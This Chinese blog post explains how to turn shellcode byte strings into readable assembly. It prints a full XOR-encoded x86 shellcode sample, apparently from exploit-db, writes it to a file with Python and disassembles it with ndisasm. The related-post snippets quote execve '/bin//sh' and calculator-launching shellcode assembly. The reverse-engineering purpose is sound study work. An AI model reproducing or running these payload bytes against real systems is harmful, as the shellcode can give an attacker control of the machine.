shellcode字节码和汇编的相互转换

已于 2024-03-05 18:01:58 修改
阅读量477 收藏 1
点赞数 5
分类专栏: shellcode 文章标签: 汇编
于 2024-03-05 18:00:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/programmer_yuan/article/details/136484073
版权

# 开展shellcode研究时,在exploit-db上看到多数的样本都是shellcode字节码,不易阅读。

在此记录下shellcode和汇编的相互转换。

##1. 利用python脚本把16进制转化为可执行文件(.exe)

shellcode = b"\xEB"
b"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
b"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
b"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
b"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
b"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
b"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
b"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
b"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
b"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
b"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
b"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
b"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
b"\x78\x65\x78\x1D"
with open("shellcode.exe","wb") as fp:
	fp.write(shellcode)

~linux环境下,命令和结果入下图:

~利用xxd命令可以查看文件的16进制字节流,如下图:

##2 使用intel指令集反汇编shellcode

A.工具安装,采用如下命令安装反汇编工具。

sudo apt-get install nasm

B. 反汇编命令。

ndisasm shellcode.exe -p intel

C. 结果如下图(部分)

##3其他工具也可以实现字节码到汇编的转换,有空在更新。

参考博客:

shellcode转换为汇编代码的方法_shellcode转换为汇编指令-CSDN博客

via高山景行
关注
专栏目录
汇编语言编写shellcode实现弹窗计算器
yeanhoo的博客
04-04 1942
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
linux环境下shellcode的编写:32位和64位
lifanxin的博客
12-10 4373
linux环境下shellcode的编写shellcode的理解使用pwntools工具编写自己实现更精炼的32位shellcode64位shellcode shellcode的理解   我们在做pwn的时候经常需要使用shellcode来获取到flag,那么shellcode如何理解,简单一句话就是:获取到shellcode就是shellcode。   在漏洞利用过程时,我们将精心编制好的shellcode通过有问题的程序写入到内存中,然后执行。该shellcode对应的c语言代码一般为: system
shellcode转换工具
07-26
shellcode转换工具
shellcode转换汇编代码
SauceJ的专栏
09-16 5066
方法1:提取ShellCode中的机器码---->把机器码粘贴到WinHEX并保存成exe文件---->用C32Asm反汇编---->得到反汇编码。 方法2:提取ShellCode中的机器码---->用OllyDBG随便打开一个exe程序---->把机器码直接二进制粘贴到OllyDBG---->得到反汇编码。
汇编转为shellcode形式
01-15
本程序开发环境为VC6.0,将汇编语言转为C语言或unicodeshellcode形式并保存在记事本中。
shellcode转换汇编代码的方法
counsellor的专栏
07-05 6665
0x00 shellcode 这段是楼主最近在看历史中的exp时发现的shellcode,功能是弹计算器,在09年时使用很广泛,但是没有找到相关的分析文献,准备有时间研究下。 0xdb 0xc0 0x31 0xc9 0xbf 0x7c 0x16 0x70 0xcc 0xd9 0x74 0x24 0xf4 0xb1 0x1e 0x58 0x31 0x78 0x18 0x83 0xe8 0xfc ...
71.windbg-转换shellcode汇编
hgy413的专栏
12-26 1469
很简单的小操作 1.创建一块内存 2.写入shellcode 3.看汇编以下面的shellcode为例: 0x55 0x8b 0xec 0x56 0x8b 0x75 0x08 0x33 0xc0 0x85 0xf6 0x74 0x1c 0x8b 0x0e 0x85 0xc9 0x74 0x16 0x39 0x46 0x04 0x74 0x11 0x57 0xff 0xd1 0x8b 0xf
Shellex:针对shellcode转换与处理工具,2024年最新高级网络安全开发必看
最新发布
m0_55030688的博客
04-18 349
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
Shellcode
weixin_43916678的博客
07-07 8980
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
网络攻防技术—shellcode编写实验
wion03的博客
10-18 1512
shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode。编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。
shellcode转换字符串
07-18
shellcode转换字符串
利器!schelper151_shellcode转为64位汇编32位汇编(包密码为123)
02-10
schelper151 包的密码为123,为了防被杀。 shellcode转为64位汇编32位汇编 也可以将64位汇编32位汇编转为各种类型的shellcode,利器!! 例如我要将C语言数组类型的shellcode转化为64位汇编,命令为: schelper.exe -i c.txt -s 0 -d 27 -dp x64 其中把shellcode写到文件c.txt
字节集转汇编工具
05-27
可以字节集代码转换汇编代码!使用方便,减少大量编程效率
字节集转汇编工具,很好用的工具
04-07
字节集转汇编工具,很好用的工具,可以将字节集的代码转换汇编代码!!!
字节集转汇编指令-易语言
06-12
自己研究x86 32位字节码时候写的软件 有些字节码可能解析错误,毕竟没有全面的信息
shellcode转为2进制,比如shell[]="\xXX"此种形式的文件将字符\xXX转换为2进制文件
07-08
总之,将Shellcode从`\xXX`形式转换为二进制文件是渗透测试和安全研究中的常见操作,它涉及到对底层计算机系统的深刻理解以及对编程语言特性的熟练运用。通过这种方式,攻击者可以构建自定义的payload,以适应特定的...
【Python】使用Python将Shellcode转换汇编
weixin_30664615的博客
11-26 916
1、介绍 需要多少行代码转换hex成反汇编呢? 多亏了Python的Capstone库,做这件事只需要五行。 在二进制分析中,进行Exploit开发或逆向工程时,需要快速将十六进制的Shellcode反编译成反汇编。你可以使用像OllyDbg或IDA Pro这样的反编译工具,但如果你不想使用一个成熟的反编译工具执行这个小任务,那么下面的Python代码将有助于你把Shellcode转换成...
转换汇编shellcode的过程
Tesi1a的充电桩
09-28 2127
汇编代码如下:section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh"编译执行过程如下
linux shellcode汇编,shellcode转换汇编代码的方法
weixin_42515842的博客
05-16 409
0x00 shellcode这段是楼主最近在看历史中的exp时发现的shellcode,功能是弹计算器,在09年时使用很广泛,但是没有找到相关的分析文献,准备有时间研究下。0xdb 0xc0 0x31 0xc9 0xbf 0x7c 0x16 0x70 0xcc 0xd9 0x74 0x24 0xf4 0xb1 0x1e 0x58 0x31 0x78 0x18 0x83 0xe8 0xfc 0x03...
ARM汇编基础与Shellcode编写实战
"这篇文档是关于在ARM平台上编写汇编语言SHELLCODE的教程,适合初学者入门。它涵盖了ARM汇编基础、常用指令、模式切换、地址计算、分支指令,以及如何编写ARM Shellcode,包括系统调用、参数映射、逆向工程等实践...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值